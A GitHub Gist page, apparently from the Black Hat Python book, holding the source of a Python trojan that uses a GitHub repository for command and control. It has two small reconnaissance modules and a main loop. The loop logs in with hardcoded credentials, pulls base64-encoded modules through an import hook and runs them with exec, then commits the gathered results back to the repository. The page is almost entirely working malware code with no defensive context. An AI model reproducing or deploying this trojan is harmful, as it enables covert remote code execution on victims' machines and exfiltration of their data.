Created
February 18, 2015 17:49
-
-
Save sh1nu11bi/a6bb3f67a53f04453f4f to your computer and use it in GitHub Desktop.
Git_Command and Control_BH Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # dirlister.py | |
| __version__ = "0.1" | |
| import os | |
| def run(**args): | |
| print "[*] Dirlister module." | |
| files = os.listdir(".") | |
| return str(files) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # environment.py | |
| __version__ = "0.1" | |
| import os | |
| def run(**args): | |
| version = "0.1" | |
| print "[*] Environment module." | |
| return str(os.version) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import base64 | |
| import sys | |
| import time | |
| import imp | |
| import random | |
| import threading | |
| import Queue | |
| import os | |
| from github3 import login | |
| trojan_id = "abc" | |
| trojan_config = "%s.json" % trojan_id | |
| data_path = "data/%s/" % trojan_id | |
| trojan_modules= [] | |
| task_queue = Queue.Queue() | |
| configured = False | |
| class GitImporter(object): | |
| def __init__(self): | |
| self.current_module_code = "" | |
| def find_module(self,fullname,path=None): | |
| if configured: | |
| print "[*] Attempting to retrieve %s" % fullname | |
| new_library = get_file_contents("modules/%s" % fullname) | |
| if new_library is not None: | |
| self.current_module_code = base64.b64decode(new_library) | |
| return self | |
| return None | |
| def load_module(self,name): | |
| module = imp.new_module(name) | |
| exec self.current_module_code in module.__dict__ | |
| sys.modules[name] = module | |
| return module | |
| def connect_to_github(): | |
| gh = login(username="blackhatpythonbook",password="justin1234") | |
| repo = gh.repository("blackhatpythonbook","chapter7") | |
| branch = repo.branch("master") | |
| return gh,repo,branch | |
| def get_file_contents(filepath): | |
| gh,repo,branch = connect_to_github() | |
| tree = branch.commit.commit.tree.recurse() | |
| for filename in tree.tree: | |
| if filepath in filename.path: | |
| print "[*] Found file %s" % filepath | |
| blob = repo.blob(filename._json_data['sha']) | |
| return blob.content | |
| return None | |
| def get_trojan_config(): | |
| global configured | |
| config_json = get_file_contents(trojan_config) | |
| config = json.loads(base64.b64decode(config_json)) | |
| configured = True | |
| for task in config: | |
| if task['module'] not in sys.modules: | |
| exec("import %s" % task['module']) | |
| return config | |
| def store_module_result(data): | |
| gh,repo,branch = connect_to_github() | |
| remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000)) | |
| repo.create_file(remote_path,"Commit message",base64.b64encode(data)) | |
| return | |
| def module_runner(module): | |
| task_queue.put(1) | |
| result = sys.modules[module].run() | |
| task_queue.get() | |
| # store the result in our repo | |
| store_module_result(result) | |
| return | |
| # main trojan loop | |
| sys.meta_path = [GitImporter()] | |
| while True: | |
| if task_queue.empty(): | |
| config = get_trojan_config() | |
| for task in config: | |
| t = threading.Thread(target=module_runner,args=(task['module'],)) | |
| t.start() | |
| time.sleep(random.randint(1,10)) | |
| time.sleep(random.randint(1000,10000)) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment